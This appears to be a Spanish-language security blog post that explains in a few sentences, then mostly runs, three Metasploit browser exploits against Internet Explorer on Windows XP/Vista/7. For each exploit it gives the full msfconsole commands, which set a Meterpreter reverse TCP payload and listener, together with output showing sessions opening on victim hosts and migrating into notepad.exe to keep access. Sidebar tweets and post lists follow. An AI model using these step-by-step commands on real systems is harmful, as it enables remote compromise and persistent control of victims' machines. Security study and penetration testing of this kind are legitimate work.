Penetrando Sistemas Windows con MetaSploit FrameWork – Parte I
CONCEPTOS BASICOS DE PENETRACION EN MAQUINAS BAJO PLATAFORMA WINDOWS XP/VISTA/7 USANDO METASPLOIT FRAMEWORK – Parte I
En esta ocasión se indicarán algunas vulnerabilidades que pueden ser empleadas con el fin de comprometer sistemas bajo plataformas Windows usando MetaSploit Faremwork, cabe anotar que casi todos los exploits que se detallan a continuación, funcionan correctamente en casi todas las implementaciones de Windows, pero dependen directamente de la versión de IE instalada en la maquina objetivo.
Vulnerabilidad ANI
Se trata de una vulnerabilidad tradicional de buffer overflow que afecta a maquinas bajo Windows XP, 2003, 2008 y Vista, aprovechando una dirección de memoria vulnerable a ser sobrescrita y manipulada al gusto del atacante (o expresado de un modo mas adecuado, al gusto del programador) que es común a navegadores web tales como IE 6.X, IE 7.X, Opera, Safari y Firefox, su uso desde Metasploit resulta muy sencillo, como la mayoría de exploits desde la consola de MSF.
| msf exploit(handler) > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize msf exploit(ms07_017_ani_loadimage_chunksize) > show options Module options (exploit/windows/browser/ms07_017_ani_loadimage_chunksize): Name Current Setting Required Description —- ————— ——– ———– SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 80 yes The daemon port to listen on SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH / yes The URI to use. Exploit target: Id Name – —- 0 (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista msf exploit(ms07_017_ani_loadimage_chunksize) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms07_017_ani_loadimage_chunksize) > set LHOST 192.168.1.34 LHOST => 192.168.1.34 msf exploit(ms07_017_ani_loadimage_chunksize) > set LPORT 4444 LPORT => 4444 msf exploit(ms07_017_ani_loadimage_chunksize) > set SRVPORT 8080 SRVPORT => 8080 msf exploit(ms07_017_ani_loadimage_chunksize) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.34:4444 [*] Using URL: http://0.0.0.0:8080/ [*] Local IP: http://192.168.1.34:8080/ [*] Server started. |
Una vez la víctima entra en la dirección donde se encuentra en ejecución el servicio MetaSploit, se envía el stager y se abre una sesión meterpreter.
| msf exploit(ms07_017_ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize [*] Sending HTML page to 192.168.1.36:49280… [*] Attempting to exploit ani_loadimage_chunksize [*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.1.36:49280… [*] Sending stage (749056 bytes) to 192.168.1.36 [*] Meterpreter session 1 opened (192.168.1.34:4444 -> 192.168.1.36:49281) at Thu May 12 22:44:24 +0200 2011 |
VULNERABILIDAD EN DATA BINDING
Vulnerabilidad sobre las funciones de Data Binding XML de Internet Explorer 6.0, 7.0 y 8.0, el modulo existente en Metasploit para explotar esta vulnerabilidad utiliza una técnica llamada “Inyección de DLL en memoria con .NET” que crea un objeto vtable en una ubicación conocida con todos los métodos de dicho vtable apuntando hacia el payload del atacante, dado que el segmento .text (segmento ejecutable en Assembly) de la DLL de .NET no es escribible, un stub de código predefinido es utilizado para copiar el payload en un nuevo segmento de memoria y continuar la ejecución desde allí.
| msf > use exploit/windows/browser/ms08_078_xml_corruption
msf exploit(ms08_078_xml_corruption) > show options Module options (exploit/windows/browser/ms08_078_xml_corruption): Name Current Setting Required Description —- ————— ——– ———– SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description —- ————— ——– ———– EXITFUNC process yes Exit technique: seh, thread, none, process LHOST 192.168.1.33 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name – —- 0 Automatic msf exploit(ms08_078_xml_corruption) > set LPORT 4446 LPORT => 4446 msf exploit(ms08_078_xml_corruption) > set SRVPORT 8082 SRVPORT => 8082 msf exploit(ms08_078_xml_corruption) > set URIPATH / URIPATH => / msf exploit(ms08_078_xml_corruption) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.33:4446 [*] Using URL: http://0.0.0.0:8082/ [*] Local IP: http://192.168.1.33:8082/ [*] Server started. |
Cuando el navegador de la victima accede a la ruta anteriormente establecida, se envía la DLL y comienza la corrupción de memoria, si resulta exitosa dicha inyección, se obtiene una sesión meterpreter.
| msf exploit(ms08_078_xml_corruption) >
[*] Sending DLL to 192.168.1.40:49229… [*] Sending Internet Explorer Data Binding Memory Corruption init HTML to 192.168.1.40:49229… [*] Sending Internet Explorer Data Binding Memory Corruption init HTML to 192.168.1.40:49229…[*] Sending exploit HTML to 192.168.1.40:49229 token=dll… [*] Sending stage (749056 bytes) to 192.168.1.40 [*] Meterpreter session 2 opened (192.168.1.33:4446 -> 192.168.1.40:49230) at Sat May 14 22:52:28 +0200 2011 |
Memory Corruption CfunctionPointer IE 7 (Windows XP/Vista)
Se trata de una vulnerabilidad relacionada con la función CfunctionPointer que consiste básicamente, en el aprovechamiento de un fallo de implementación de dicha función en donde se intenta acceder a memoria sin inicializar, de esta forma un atacante podría acceder remotamente, explotar esta vulnerabilidad y ejecutar código arbitrario en el sistema con los privilegios de la víctima.
| msf > use exploit/windows/browser/ms09_002_memory_corruption
msf >exploit(ms09_002_memory_corruption) > show options Module options (exploit/windows/browser/ms09_002_memory_corruption): Name Current Setting Required Description —- ————— ——– ———– SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Exploit target: Id Name – —- 0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7 msf exploit(ms09_002_memory_corruption) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms09_002_memory_corruption) > set LHOST 192.168.1.34 LHOST => 192.168.1.34 msf exploit(ms09_002_memory_corruption) > set LPORT 4445 LPORT => 4445 msf exploit(ms09_002_memory_corruption) > set SRVPORT 8082 SRVPORT => 8082 msf exploit(ms09_002_memory_corruption) > set URIPATH / URIPATH => / msf exploit(ms09_002_memory_corruption) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.34:4446 [*] Using URL: http://0.0.0.0:8082/ [*] Local IP: http://192.168.1.34:8082/ [*] Server started. |
Una vez un cliente ha entrado desde el navegador a la ruta donde se encuentra el servicio de metasploit ejecutándose, inmediatamente se obtiene una sesión meterpreter. Como característica interesante, el exploit intenta migrar el proceso a otro distinto con el fin de garantizar el acceso en el caso de que la víctima cierre el navegador.
| msf exploit(ms09_002_memory_corruption) >
[*] Sending Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption to 192.168.1.36:49356… [*] Sending stage (749056 bytes) to 192.168.1.36 [*] Meterpreter session 2 opened (192.168.1.34:4446 -> 192.168.1.36:49357) at Fri May 13 00:17:32 +0200 2011 [*] Session ID 2 (192.168.1.34:4446 -> 192.168.1.36:49357) processing InitialAutoRunScript ‘migrate -f’ [*] Current server process: iexplore.exe (1172) [*] Spawning a notepad.exe host process… [*] Migrating into process ID 1896 [*] New server process: notepad.exe (1896) |
Número de Visitas:
Twitter Adastra
- @trufae interesante presentación. Muy buen trabajo. saludos. 15 hours ago
- @jdelgadopin me alegra que te gusten... :) tengo pensado publicar más cosillas sobre TOR y redes anónimas, en cuanto pueda... 5 days ago
- WEB HACKING – Atacando DOJO InsecureWebApp – Enumeración - Parte XXX wp.me/p1nWCG-CL 5 days ago
- RT @BorjaMerino: Stealing User Certificates with Meterpreter Mimikatz Extension darkoperator.com/blog/2013/6/12… 1 week ago
- @MrInsustancial @Genko JAJAJAJAJA... Ahí le has dado! 1 week ago
- RT @SecurityTube: [Video] Intro To Mutillidae, Burp Suite And Injection Jeremy Druin securitytube.net/video/7702 2 weeks ago
- RT @SecurityTube: Open Security Training Video series on SecurityTube: securitytube.net/tags/OpenSecur… 2 weeks ago
Entradas recientes
- WEB HACKING – Atacando DOJO InsecureWebApp – Enumeración – Parte XXX
- WEB HACKING – Atacando DOJO Hackme Casino – Sesiones inseguras en Ruby On Rails – Parte XXIX
- WEB HACKING – Atacando DOJO Hacme Casino – Controladores inseguros en Ruby OnRails – Parte XXVIII
- WEB HACKING – Atacando DOJO Hacme Casino – Otras Vulnerabilidades Parte XXVII
- WEB HACKING – Atacando DOJO Hacme Casino – Vulnerabilidad CSRF Parte XXVI
- Pasando de Netcat a Cryptcat
- WEB HACKING – Atacando DOJO Vulnerabilidades SQL Injection en Hacme Casino Parte XXV
- WEB HACKING – Atacando DOJO Enumeración Hacme Casino Parte XXIV
- WEB HACKING – Vulnerabilidades en XAMPP (Continuación) – Parte XXIII
- WEB HACKING – Vulnerabilidades en XAMPP – Parte XXII
- 2 años
- W3AFRemote r01 Liberado…
- WEB HACKING – Atacando servidores web vulnerables Tomcat – Parte XXI
- WEB HACKING – Algunos Ataques directos contra servidores web Apache – Parte XX
- WEB HACKING – Ataques directos contra servidores web – Parte XIX
Entradas
Calendario de Entradas
Sobre Adastra:
Soy un entusiasta de la tecnología y la seguridad informática, me siento atraído principalmente por la cultura y los fundamentos del Gray Hat Hacking.
Soy una persona afortunada de poder dedicar mi tiempo y energía en hacer lo que me apasiona, aprendiendo y compartiendo lo aprendido, he comenzado a editar entradas en este blog dado que he llegado a un punto en el que considero que mis conocimientos también pueden favorecer a otros que tengan las ganas de adquirirlos del mismo modo que lo hago yo. Así que con bastante frecuencia iré publicando entradas relacionadas con estudios y técnicas que he ido asimilando a lo largo de mis investigaciones, todas enfocadas con diferentes facetas de la informática con un énfasis especial en la seguridad.
Citando a Galileo:
"Nunca he encontrado una persona tan ignorante de la que no pueda aprender algo."
"No se puede enseñar nada a un hombre; sólo se le puede ayudar a encontrar la respuesta dentro de sí mismo".
Happy Hack!
Blogroll
Blogs Interesantes
Mensajes y Páginas Populares
- Hydra, Ataques de Fuerza Bruta
- Wireless Hacking – Descubriendo APs con SSID ocultos y evadiendo Mac Filters – Parte IV
- Payloads Basicos en MetaSploit FrameWork
- Preservando el Anonimato y Extendiendo su Uso – Conceptos Esenciales de TOR – Parte I
- Creando un "Fake" Access Point Inalámbrico
- Que es el Hacking
- WEB HACKING – Medidas de seguridad en servidores web Apache – Instalación, Configuración y Conceptos Básicos – Parte IV
- Uso practico de John The Ripper
- Intentando evadir mecanismos y restricciones de Seguridad – Escaneo con NMAP evadiendo Firewalls – Parte VII
- NMap para escaneo de puertos - Parte I
adastra
